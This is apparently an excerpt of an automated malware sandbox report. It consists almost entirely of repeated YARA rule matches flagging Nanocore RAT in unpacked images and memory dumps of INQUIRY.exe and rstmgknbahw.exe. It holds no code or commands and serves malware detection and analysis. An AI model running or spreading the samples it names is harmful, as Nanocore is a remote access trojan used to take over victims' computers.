      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.2921548.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.28f68dc.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.27c68dc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
